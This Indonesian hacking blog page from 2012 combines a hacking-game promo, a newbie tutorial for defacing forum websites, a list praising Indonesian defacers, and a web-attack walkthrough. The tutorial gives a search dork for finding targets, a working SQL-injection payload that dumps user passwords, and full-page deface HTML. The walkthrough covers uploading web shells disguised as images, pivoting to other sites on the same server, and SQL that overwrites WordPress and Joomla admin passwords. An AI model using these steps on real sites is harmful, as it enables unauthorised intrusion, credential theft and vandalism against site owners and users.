My Profile

Rabu, 11 April 2012

Game Simulasi Menjadi Hacker, Hacker ID - Buatan Indonesia


Menu Utama Hacker - ID Informasi tentang hacker, bagaimana mereka bekerja, dan apa motivasi mereka melakukan hal tersebut memang seringkali kita temui pada beberapa media massa. Hacker - penguji keamanan atas sesuatu hal, mulai dari manusia hingga perangkat lunak, tidak memiliki sisi baik atau buruk. Hacker adalah seperti sebutan untuk pekerjaan-pekerjaan yang lain: pengacara, hakim, dll. Namun apabila hacker ini mulai bersifat merusak dan menimbulkan kerugian, beberapa kalangan sepakat menyebut mereka dengan “cracker”.


Hacker - ID adalah salah satu game simulasi hacking yang dibuat (ulang) dengan menggunakan bahasa Indonesia yang baik dan harapannya mudah dimengerti oleh masyarakat Indonesia. Mengapa di game tentang simulasi hacking? Tujuan dari game ini adalah mengenalkan dan membiasakan pemain pada terminal sistem operasi *nix (Unix, Linux, dll) yang pada umumnya adalah sistem operasi yang digunakan untuk melakukan proses hacking. Sehingga pemain setidaknya tahu, seperti apa rasanya menjadi seorang hacker.

Download Links: Hacker Simulation Games - ID | 64 MB
Hacker - ID dibuat ulang dari framework dari salah satu game hacking populer, dengan modifikasi pada beberapa tempat dengan tujuan pemain yang berlatar belakang bahasa Indonesia mudah untuk memainkan permainan tersebut.


Pemain bermain pada sisi protagonis. Hal ini penting agar melatih diri menimbulkan keinginan untuk memanfaatkan teknologi untuk berbuat kebajikan, bukan sebaliknya. Mengapa protagonis? Seperti yang telah disebutkan sebelumnya, istilah hacker cenderung mengarah pada konotasi negatif, padahal sebenarnya hacker hanyalah sebutan, layaknya seperti pekerjaan lain. Pemain diminta untuk membantu pihak kepolisian untuk membawa ke pengadilan “cracker” lain yang telah mengacaukan sistem perbankan.


Cara Deface Website Forum Sederhana Untuk Newbie


Cara Deface website Forum Sederhana Untuk Newbie - Malem sob, Kali ini saya akan memposting tutorial tentang Cara Deface Website Forum Sederhana Untuk Newbie.

Apa Itu Deface ?

Deface/Defacing atau Cyber Grafity secara umum diartikan sebagai aktifitas menodai atau merubah halaman depan web dengan kalimat, image atau link tertentu yang tidak ada sangkut pautnya dengan misi web tersebut, Biasanya peretas men-deface suatu halaman web dengan maksud supaya eksistensinya diketahui oleh khalayak ramai.

Contoh Website Forum yang di Deface: 



Cara Men-Deface Website Forum Sederhana Untuk Newbie :
Pertama Ketik di google

inurl:/forums.asp?iFor=

Pilih target,
Contoh target

Hapus angka dibelakang =
Hingga menjadi ini

Setelah = masukan SQL inject
12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,11,12+from+users

Hingga menjadi seperti ini

Tulisan yg berderet di bawah nama 10 TOPICS itu adalah username
Tulisan yg berderet di bawah nama DATED itu adalah passwordnya

Cari username admin & passnya.
Ok..pada web target yg jadi bahan tutor ini saya menemukan username & password
Username : admin
Password : default

Sekarang klik tulisan login yg berada diatas.
Nah... login udah berhasil
Sekarang jika ingin melakukan defacing, klik tulisan "POST NEW TOPICS"

Isi Subjectnya...
Contoh : HACKED BY BLA BLA BLA
lalu masukin script deface HTMLnya ke kolom dibawah subject.

Jika ingin menutup full seluruh halaman, pake kode berikut :

<DIV align=center><DIV id=layer1 style="border-right: #000000 1px; border-top: #000000 1px; z-index: 1; left: 0px; border-left: black 1px; width: 1350px; border-bottom: black 1px; position: absolute; top: 0px; height: 698px; background-color: black; layer-background-color: black"><center> <br><b><font face="papyrus" color="red" size="5">Hacked By Cirebon-Cyber4rt</font></h2><br><br><img src="http://i1121.photobucket.com/albums/l513/iqbalkanci/images8.jpg"><br><br> <font face="papyrus" color="green" size="4">Thanks To: Hacker Newbie Community | YogyaCarderLink | DevilzCode | Indonesian BlackHat | etc</a><br> <br><font color="red" size="3">Wkwkwkwk </DIV>

Kode diatas bisa diubah sesuai keinginan sobat.
Trus klik tombol post...
Ok, HTML deface'an sobat udah masuk... sekarang klik judul postingan yang sobat tulis di subject tadi.

Sekian, Good Luck !


Daftar 10 Defacer yang Mengharumkan Nama Indonesia


Pada tau deface kan? Yap benar sekali, salah satu Seni hacking yang merubah index suatu website. Udah tau? Bahwa defacer Indonesia yang active (Bisa di Bilang Mengesankan) Ini saya kutib dari beberapa sumber MagelangCyber, Indonesian Defacer, Archive Santri Cyber & Zone-H.


Banyak yang bilang Seni hacking ini banyak dilakukan (Para Lamer), tidak semua defacer Begitu! Berikut Daftar 10 Defacer yang Mengharumkan Nama Indonesia:

  1. kaMtiEz - Adalah salah satu orang lama dalam bidang Deface Mendeface Ini, Diapun di kenal Dengan Crewnya (Magelang Cyber) & Indonesian Coder. Defacer satu ini wajib di acungi Jempol.
  2. Jundab - Dia adalah teman dari KaMitiEz itu sendiri, banyak yang bilang bahwa defacer satu Ini (Berbau Jihad) (Terlihat pada Html Defaced Nya Sendiri) diapun dikenal dengan Mass Junz Magelang Cyber.
  3. Hmei7 - Mempunyai Skill Vb6 yang memadai & yang sering menyatroni Forum Underground Ini berasal Dari semarang. Diapun Bisa di kenal teman Mas Junz & Kamitiez, Jangan anggap enteng defacer satu ini.
  4. Kal0ng666 - Kal0ng666 (Dari Nick saja) Kalian sudah bisa menebak salah satu attacker Situs Pemerintah & Forum Underground ini. Dari Pekalongan (Pekalongan Blackhat). Tentu saja dengan team/teman, seperti Hmei7, kaMitiEz & Jundab dia cepat dikenal Masyarakat Dunia maya !
  5. Dr.Cruzz - Dr.Cruzz adalah salah seorang Staff Indonesiancoder, terlihat dari sifat misteriusnya. Dari dia mendeface forum Hacking Regional ternama (PalembangHackerLInk) Nama dia terkenal sejak aksi Defacenya, di PHL Defacer satu ini Wajib Kita acungi 4 jempol XD
  6. Al3x_0wn5 - Defacer satu ini juga pernah melakukan deface pada situs regional lainya. terdengar dia anak Medan (Yang menentang Forum Regional Sendiri) yap medan Cyber, Tapi dengan skill yang memadahi Alex pantas kita anggap sebagai Top 10 Indonesian Defacer.
  7. Ho1onk - Kebalikan Al3x, si Ho1onk Ini adalah orang penting di (Hacker-Newbie) dia Menajabat sebagai Mod (Admin di MedanCYberTeam) << yang di Benci Al3x, dan Juga keahliannya di Bidang mIRC memaksa kita angkat kaki dah, Archive yang rata-rata webshop membuat pada carder marah. Dia pantas disebut menjilat lidah sendiri.
  8. BaghazzNewbie23 - Defacer satu ini sudah terkenal di google, apa lagi dengan wordpress, wordpress yang dia deface. dia pantas Mendapatkan Profesional Security Wordpres.
  9. Marwanz - Disini saya Melihat dia Baru Masuk (20 Besar Di IndevEs), Tapi website yang dia archivekan sendiri harus membuat saya mengakui bahwa dia memang top, dan Kami Banyak Melihat (user satu ini) Memiliki Banyak masalah kepada defacer Besar (enteh kenapa?).
  10. Onestree - Defacer , yang mempunyai banyak teman ini, adalah Pemimpin dari IslamCYber, yang sampai kini onestree terus mengahajar situs Malay.


Beberapa Pengertian-Pengertian Dasar dan Alur Web Attack


Beberapa Pengertian-Pengertian Dasar dan Alur Web AttackAda berbagai cara yang dilakukan oleh seorang hacker untuk mencari kelemahan sebuah sistem website. Sehingga mereka bisa menghack website tersebut. Ada berbagai tujuan seorang hacker dalam hack website mencuri informasi pengguna, sampai hanya sekedar iseng saja.


Gambaran Web Attack:
Scan > XPL/SQLi > Upload Shell > Deface/Jumping > Rooting

- Scan
  • Scan - Yaitu mencari tau dimana letak kelemahan web target. Bisa discan pake beberapa tool scanner. Diantar'a yang paling terkenal:
    Acunetix [ Windows ]
    Nikto [ Linux ]
    Selain dapat mendapatkan bug kita juga dengan tool itu akan dapat mengumpulkan informasi berguna dari web target.
- XPL/SQLi
  • XPL/SQLi -  Setelah kita dapat menemukan data-data dari web target. Kita coba cari cara untuk meng-Exploitasi bug-bug yang sudah kita temukan dengan tool scanner tadi. Dibawah ini adalah daftar situs yang menyediakan macam-macam Exploit:
    Exploit Database
    Inj3ct0r
    Packet Storm
    Apabila target menggunakan CMS Joomla/Wordpress, kita dapat mencari Exploit untuk plugin-plugin yang digunakan web target. Karena dengan tool scanner diatas kita diberikan informasi seakan-akan web target sudah dibedah keseluruhannya. Jadi kita tahu isi folder dari web target, termasuk plugin-plugin apa saja yang digunakan.
  • Kalau teknik SQLi dapat dilihat disini: SQLi Tutorial [ Download ]
- Upload Shell
  • Upload Shell -  Kalau Website sudah bisa di Exploitasi dan kita sudah bisa masuk ke halaman panel admin. Tinggal kita upload shellnya sekarang:
    Upload shell di Wordpress bisa mengupload plugin or thema yang sudah disisipi file shellnya.
    Upload shell di Joomla juga sama, cuma bisa juga menggunakan Plugin Ninja Explorer
    Upload Shell di CMS biasa bisa melalui menu upload gambar, kalau tidak bisa coba shellnya direname menjadi shell.php shell.jpg lalu upload.
    Setelah shell berhasil diupload tinggal panggil letak URL shellnya dimana.
- Deface/Jumping
  • Deface/Jumping - Kalau pengen gaya-gaya'an ( Deface ) Cari file index.php lalu ubah file didalamnya dengan script Deface yang kita punya. Bagi yang malas bikin script deface, dapat menggunakan tool Deface Maker Kemudian arsipkan website yang sudah kita deface disitus:
    Indonesian Defacer - Suspensed
    Magelang Cyber - Not Active
    Zone-h - Active
  • Tidak cukup hanya bisa men-Deface satu web saja. Coba gunakan teknik jumping untuk masuk ke web yang satu server sama web yang telah kita deface. Caranya ?
    Script Code: Click Here
    - Upload script jumpingnya
    - Rename menjadi jumpingfinder.php
    - Panggil letak file URL tersebut
    - Masuk ke public_html web target
    - Masuk ke MySQL nya [ Cari account MySQL difile config ]
    - Cari table user
    - Update password user admin
  • Dibawah ini ada script khusus untuk update user password admin:
    #Wordpress [ PHP Code ]
    UPDATE `note_wrdp1`.`wp_users` SET `user_pass` = '$P$BdEAI5H.T0REbjjKME506zOW03nggb0' WHERE `wp_users`.`ID` = 1 LIMIT 1;

    #Joomla [ PHP Code ]
    update `jos_users` set `password`="ece4f1e9e99fe6ca77c100d02cf4aa60" where `username`="admin";
  • Password admin sudah berhasil diupdate, tinggal ikuti seperti langkah nomor 3. 
- Rooting
  • Rooting - pada tahap ini kita bisa nyantai, karena semua step sudag terlewati.


Related Posts Plugin for WordPress, Blogger...

HACKING

Terbaru >>

Top Post >>

 

S E R V I C E ' s aLL ShArE Copyright © 2010 Endy_Djubu is Designed by 3nfitry